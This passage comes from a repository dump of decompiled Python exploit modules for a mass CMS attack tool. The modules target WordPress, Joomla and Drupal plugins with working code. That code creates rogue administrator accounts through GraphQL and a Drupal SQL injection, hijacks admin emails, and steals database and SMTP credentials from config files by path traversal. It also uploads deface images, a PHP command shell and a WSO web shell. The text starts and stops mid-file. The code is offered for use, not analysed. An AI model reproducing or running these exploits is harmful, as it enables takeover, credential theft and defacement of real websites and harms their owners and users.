9.3.0] 5 | # Embedded file name: Exploits\CVE_2019_9879wp_graphql.py 6 | import json 7 | import requests 8 | from Exploits import printModule 9 | headers = {'Content-type': 'application/json', 10 | 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 11 | } 12 | 13 | def Exploit(url, email): 14 | try: 15 | x = url + '/graphql' 16 | username = 'u1337' 17 | password = 'admin1337' 18 | response = requests.post('http://' + x, data=json.dumps({'': ''}), headers=headers) 19 | if response.status_code == 200: 20 | payload = {'query': 'mutation{registerUser(input:{clientMutationId:"UWHATM8",email:"' + email + '",password:"' + password + '",username:"' + username + '",roles:["administrator"]}){clientMutationId}}'} 21 | response = requests.post('http://' + x, data=json.dumps(payload), headers=headers) 22 | if response.status_code == 200 and 'UWHATM8' in str(response.content): 23 | with open('result/AdminTakeover_results.txt', 'a') as writer: 24 | writer.write(url + '/wp-login.php --> try to login and Check email: {}\n Username: {}\n Password: {}\n------------------------------------------\n'.format(email, username, password)) 25 | return printModule.returnYes(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress') 26 | else: 27 | return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress') 28 | 29 | else: 30 | return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress') 31 | except: 32 | return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2018_19207wp_gdpr_compliance.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2018_19207wp_gdpr_compliance.py 6 | import requests 7 | import re 8 | import json 9 | from Exploits import printModule 10 | r = '\x1b[31m' 11 | g = '\x1b[32m' 12 | y = '\x1b[33m' 13 | b = '\x1b[34m' 14 | m = '\x1b[35m' 15 | c = '\x1b[36m' 16 | w = '\x1b[37m' 17 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 18 | 19 | def Exploit(site, email): 20 | try: 21 | Ex1 = 'http://' + site + '/wp-admin/admin-ajax.php' 22 | headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 23 | GET = requests.get('http://' + site, headers=headers, timeout=10) 24 | AjaxTokEN = re.findall('"ajaxSecurity":"(.*)"', str(GET.content))[0] 25 | payload = {'action': 'wpgdprc_process_action','security': str(AjaxTokEN)} 26 | payload['data'] = json.dumps({'type': 'save_setting', 27 | 'append': False, 28 | 'option': 'new_admin_email', 29 | 'value': email 30 | }) 31 | GG = requests.post(Ex1, timeout=10, headers=headers, data=payload) 32 | if '{"message":"","error":""}' in str(GG.content): 33 | with open('result/AdminTakeover_results.txt', 'a') as writer: 34 | writer.write(site + '/wp-login.php --> reset Link Sended to: {}\n------------------------------------------\n'.format(email)) 35 | return printModule.returnYes(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress') 36 | return printModule.returnNo(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress') 37 | except: 38 | return printModule.returnNo(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_eshop_magic.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\wp_eshop_magic.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 17 | 18 | def Exploit(site): 19 | try: 20 | Exp = 'http://' + site + 'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php' 21 | GetConfig = requests.get(Exp, timeout=5, headers=Headers) 22 | if 'DB_PASSWORD' in GetConfig.content: 23 | with open('result/Config_results.txt', 'a') as ww: 24 | ww.write('Full Config Path : ' + Exp + '\n') 25 | try: 26 | Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content) 27 | Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content) 28 | Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content) 29 | Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content) 30 | with open('result/Config_results.txt', 'a') as ww: 31 | ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 32 | except: 33 | return printModule.returnYes(site, 'N/A', 'eshop-magic', 'Wordpress') 34 | 35 | return printModule.returnYes(site, 'N/A', 'eshop-magic', 'Wordpress') 36 | return printModule.returnNo(site, 'N/A', 'eshop-magic', 'Wordpress') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'eshop-magic', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_Job_Manager.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_Job_Manager.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 10 | } 11 | Jce_Deface_image = 'files/pwn.gif' 12 | 13 | def Exploit(site): 14 | try: 15 | Exploit = '/jm-ajax/upload_file/' 16 | CheckVuln = requests.get('http://' + site + Exploit, timeout=5, headers=Headers) 17 | if '"files":[]' in CheckVuln.content: 18 | try: 19 | IndeXfile = {'file[]': open(Jce_Deface_image, 'rb')} 20 | GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5, headers=Headers) 21 | GetIndeXpath = re.findall('"url":"(.*)"', GoT.content) 22 | IndeXpath = GetIndeXpath[0].split('"')[0].replace('\\/', '/').split('/wp-content')[1] 23 | UploadedIndEX = site + '/wp-content' + IndeXpath 24 | Checkindex = requests.get('http://' + UploadedIndEX, timeout=5, headers=Headers) 25 | if 'GIF89a' in Checkindex.content: 26 | with open('result/Index_results.txt', 'a') as writer: 27 | writer.write(UploadedIndEX + '\n') 28 | return printModule.returnYes(site, 'N/A', 'WP Job Manager', 'Wordpress') 29 | return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress') 30 | except: 31 | return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress') 32 | 33 | else: 34 | return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress') 35 | except: 36 | return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Myblog.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_Myblog.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 10 | r = '\x1b[31m' 11 | g = '\x1b[32m' 12 | y = '\x1b[33m' 13 | b = '\x1b[34m' 14 | m = '\x1b[35m' 15 | c = '\x1b[36m' 16 | w = '\x1b[37m' 17 | Jce_Deface_image = 'files/pwn.gif' 18 | 19 | def Exploit(site): 20 | try: 21 | fileindex = {'fileToUpload': open(Jce_Deface_image, 'rb')} 22 | Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload' 23 | GoT = requests.post(Exp, files=fileindex, timeout=10, headers=Headers) 24 | if 'success' or 'File exists' in str(GoT.content): 25 | if '/images/pwn' in str(GoT.content): 26 | IndeXpath = 'http://' + site + '/images/pwn.gif' 27 | else: 28 | try: 29 | GetPAth = re.findall("source: '(.*)'", str(GoT.content)) 30 | IndeXpath = GetPAth[0] 31 | except: 32 | IndeXpath = 'http://' + site + '/images/pwn.gif' 33 | 34 | CheckIndex = requests.get(IndeXpath, timeout=10, headers=Headers) 35 | if 'GIF89a' in str(CheckIndex.content): 36 | with open('result/Index_results.txt', 'a') as writer: 37 | writer.write(IndeXpath + '\n') 38 | return printModule.returnYes(site, 'N/A', 'Com_MyBlog', 'Joomla') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WpCateGory_page_icons.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\WpCateGory_page_icons.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Jce_Deface_image = 'files/pwn.gif' 17 | 18 | def Exploit(site): 19 | try: 20 | ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5, headers=Headers) 21 | if ChckVln.status_code == 200: 22 | Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php' 23 | fileDeface = {'wpdev-async-upload': open(Jce_Deface_image, 'rb')} 24 | PostDAta = {'dir_icons': '../../../','submit': 'upload' 25 | } 26 | requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5, headers=Headers) 27 | CheckIndex = requests.get('http://' + site + '/wp-content/' + Jce_Deface_image.split('/')[1], timeout=5, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(site + '/wp-content/' + Jce_Deface_image.split('/')[1] + '\n') 31 | return printModule.returnYes(site, 'N/A', 'category-page-icons', 'Wordpress') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_pagelines.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_pagelines.py 6 | import requests 7 | from Exploits import printModule 8 | pagelinesExploitShell = 'files/settings_auto.php' 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 10 | } 11 | 12 | def Exploit(site): 13 | try: 14 | FileShell = {'file': open(pagelinesExploitShell, 'rb')} 15 | PostData = {'settings_upload': 'settings','page': 'pagelines'} 16 | Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 17 | url = 'http://' + site + '/wp-admin/admin-post.php' 18 | GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5) 19 | if GoT.status_code == 200: 20 | CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5, headers=Headers) 21 | CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5, headers=Headers) 22 | if 'Vuln!!' in CheckShell.content: 23 | with open('result/Shell_results.txt', 'a') as writer: 24 | writer.write(site + '/wp-content/vuln.php' + '\n') 25 | if 'Vuln!!' in CheckIndex.content: 26 | with open('result/Index_results.txt', 'a') as writer: 27 | writer.write(site + '/vuln.htm' + '\n') 28 | return printModule.returnYes(site, 'N/A', 'Pagelines Plugin', 'Wordpress') 29 | else: 30 | return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress') 31 | 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress') 34 | except: 35 | return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_alberghi.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_alberghi.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Jce_Deface_image = 'files/pwn.gif' 17 | 18 | def Exploit(site): 19 | try: 20 | fileDeface = {'userfile': open(Jce_Deface_image, 'rb')} 21 | Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php' 22 | Check = requests.get(Exp, timeout=10, headers=Headers) 23 | if 'class="inputbox" name="userfile"' in str(Check.content): 24 | Post = requests.post(Exp, files=fileDeface, timeout=10, headers=Headers) 25 | if 'has been successfully' or 'already exists' in str(Post.content): 26 | CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1], timeout=10, headers=Headers) 27 | if 'GIF89a' in str(CheckIndex.content): 28 | with open('result/Index_results.txt', 'a') as writer: 29 | writer.write(site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1] + '\n') 30 | return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') 31 | return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/printModule.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\printModule.py 6 | r = '\x1b[31m' 7 | g = '\x1b[32m' 8 | y = '\x1b[33m' 9 | b = '\x1b[34m' 10 | m = '\x1b[35m' 11 | c = '\x1b[36m' 12 | w = '\x1b[37m' 13 | 14 | def Print_Scanning(url, CMS): 15 | print r + ' [' + y + '*' + r + '] ' + c + url + w + ' [ ' + CMS + ' ]' 16 | 17 | 18 | def Timeout(url): 19 | print r + ' [' + y + '*' + r + '] ' + c + url + r + ' [ TimeOut!!/NotValid Url ]' 20 | 21 | 22 | def Print_NotVuln(NameVuln, site): 23 | print c + ' [' + y + '-' + c + '] ' + r + site + ' ' + y + NameVuln + c + ' [Not Vuln]' 24 | 25 | 26 | def Print_Username_Password(username, Password): 27 | print y + ' [' + c + '+' + y + '] ' + c + 'Username: ' + g + username 28 | print y + ' [' + c + '+' + y + '] ' + c + 'Password: ' + g + Password 29 | 30 | 31 | def Print_Vuln(NameVuln, site): 32 | print c + ' [' + y + '+' + c + '] ' + r + site + ' ' + y + NameVuln + g + ' [Vuln!!]' 33 | 34 | 35 | def Print_Vuln_index(indexPath): 36 | print c + ' [' + y + '+' + c + '] ' + y + indexPath + g + ' [Index Uploaded!]' 37 | 38 | 39 | def Print_vuln_Shell(shellPath): 40 | print c + ' [' + y + '+' + c + '] ' + y + shellPath + g + ' [Shell Uploaded!]' 41 | 42 | 43 | def Print_vuln_Config(site): 44 | print c + ' [' + y + '+' + c + '] ' + y + site + g + ' [Config Downloaded!]' 45 | 46 | 47 | def returnYes(target, CVE, Name, CMS): 48 | return [ 49 | '{}{}{}'.format(y, target, w), '{}{}{}'.format(c, CVE, w), 50 | '{}{}{}'.format(w, Name, w), '{}YES{}'.format(g, w), '{}{}{}'.format(c, CMS, w)] 51 | 52 | 53 | def returnNo(target, CVE, Name, CMS): 54 | return [ 55 | '{}{}{}'.format(y, target, w), '{}{}{}'.format(c, CVE, w), 56 | '{}{}{}'.format(w, Name, w), '{}NO{}'.format(r, w), '{}{}{}'.format(c, CMS, w)] -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_CCkJseblod.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_CCkJseblod.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import getSMTP 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 11 | r = '\x1b[31m' 12 | g = '\x1b[32m' 13 | y = '\x1b[33m' 14 | b = '\x1b[34m' 15 | m = '\x1b[35m' 16 | c = '\x1b[36m' 17 | w = '\x1b[37m' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php' 22 | GetConfig = requests.get(Exp, timeout=10, headers=Headers) 23 | if 'JConfig' in str(GetConfig.content): 24 | with open('result/Config_results.txt', 'a') as ww: 25 | ww.write('Full Config Path : ' + Exp + '\n') 26 | try: 27 | Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) 28 | Getuser = re.findall("user = '(.*)';", str(GetConfig.content)) 29 | Getpass = re.findall("password = '(.*)';", str(GetConfig.content)) 30 | Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) 31 | with open('result/Config_results.txt', 'a') as ww: 32 | ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 33 | getSMTP.GETSmtpJoomConf(str(GetConfig.content)) 34 | except: 35 | return printModule.returnYes(site, 'N/A', 'Com_CCkJseblod', 'Joomla') 36 | 37 | return printModule.returnYes(site, 'N/A', 'Com_CCkJseblod', 'Joomla') 38 | return printModule.returnNo(site, 'N/A', 'Com_CCkJseblod', 'Joomla') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Com_CCkJseblod', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Macgallery.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_Macgallery.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import getSMTP 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 11 | r = '\x1b[31m' 12 | g = '\x1b[32m' 13 | y = '\x1b[33m' 14 | b = '\x1b[34m' 15 | m = '\x1b[35m' 16 | c = '\x1b[36m' 17 | w = '\x1b[37m' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php' 22 | GetConfig = requests.get(Exp, timeout=10, headers=Headers) 23 | if 'JConfig' in str(GetConfig.content): 24 | with open('result/Config_results.txt', 'a') as ww: 25 | ww.write('Full Config Path : ' + Exp + '\n') 26 | try: 27 | Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) 28 | Getuser = re.findall("user = '(.*)';", str(GetConfig.content)) 29 | Getpass = re.findall("password = '(.*)';", str(GetConfig.content)) 30 | Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) 31 | with open('result/Config_results.txt', 'a') as ww: 32 | ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 33 | getSMTP.GETSmtpJoomConf(str(GetConfig.content)) 34 | except: 35 | return printModule.returnYes(site, 'N/A', 'Com_Macgallery', 'Joomla') 36 | 37 | return printModule.returnYes(site, 'N/A', 'Com_Macgallery', 'Joomla') 38 | return printModule.returnNo(site, 'N/A', 'Com_Macgallery', 'Joomla') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Com_Macgallery', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Hdflvplayer.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_Hdflvplayer.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import getSMTP 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 11 | r = '\x1b[31m' 12 | g = '\x1b[32m' 13 | y = '\x1b[33m' 14 | b = '\x1b[34m' 15 | m = '\x1b[35m' 16 | c = '\x1b[36m' 17 | w = '\x1b[37m' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = 'http://' + site + '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php' 22 | GetConfig = requests.get(Exp, timeout=5, headers=Headers) 23 | if 'JConfig' in str(GetConfig.content): 24 | with open('result/Config_results.txt', 'a') as ww: 25 | ww.write('Full Config Path : ' + Exp + '\n') 26 | try: 27 | Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) 28 | Getuser = re.findall("user = '(.*)';", str(GetConfig.content)) 29 | Getpass = re.findall("password = '(.*)';", str(GetConfig.content)) 30 | Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) 31 | with open('result/Config_results.txt', 'a') as ww: 32 | ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 33 | getSMTP.GETSmtpJoomConf(str(GetConfig.content)) 34 | except: 35 | return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') 36 | 37 | return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') 38 | return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Joomanager.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_Joomanager.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import getSMTP 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 11 | r = '\x1b[31m' 12 | g = '\x1b[32m' 13 | y = '\x1b[33m' 14 | b = '\x1b[34m' 15 | m = '\x1b[35m' 16 | c = '\x1b[36m' 17 | w = '\x1b[37m' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = 'http://' + site + '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php' 22 | GetConfig = requests.get(Exp, timeout=10, headers=Headers) 23 | if 'JConfig' in str(GetConfig.content): 24 | with open('result/Config_results.txt', 'a') as ww: 25 | ww.write('Full Config Path : ' + Exp + '\n') 26 | try: 27 | Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) 28 | Getuser = re.findall("user = '(.*)';", str(GetConfig.content)) 29 | Getpass = re.findall("password = '(.*)';", str(GetConfig.content)) 30 | Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) 31 | with open('result/Config_results.txt', 'a') as ww: 32 | ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 33 | getSMTP.GETSmtpJoomConf(str(GetConfig.content)) 34 | except: 35 | return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') 36 | 37 | return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') 38 | return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_civicrm.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_civicrm.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import getSMTP 9 | from Tools import wsoShellUploaderModule 10 | payloadshell = '"Vuln!!"'.format('system({}'.format('$_GET["cmd"]')) 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | requests.post('http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) 17 | Exp = requests.get('http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/vuln.php', headers=Headers, timeout=10) 18 | if 'Vuln!!' in str(Exp.content): 19 | with open('result/Shell_results.txt', 'a') as writer: 20 | writer.write(site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' + '\n') 21 | getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/vuln.php?cmd=id') 22 | WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/vuln.php?cmd=id') 23 | if WSo == 'No': 24 | pass 25 | else: 26 | with open('result/WSo_Shell.txt', 'a') as Wr: 27 | Wr.write('{}\n'.format(WSo)) 28 | return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla') 29 | return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla') 30 | except: 31 | return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2014_3704Drupal_add_Admin.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2014_3704Drupal_add_Admin.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | user = 'u1337' 19 | password = 'admin1337' 20 | Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55] 21 | POSTDATA = {'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]', 22 | 'name[0]': 'test', 23 | 'pass': 'shit2', 24 | 'test2': 'test', 25 | 'form_build_id': '', 26 | 'form_id': 'user_login_block', 27 | 'op': 'Log+in' 28 | } 29 | agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 30 | try: 31 | resp = requests.post('http://' + site + 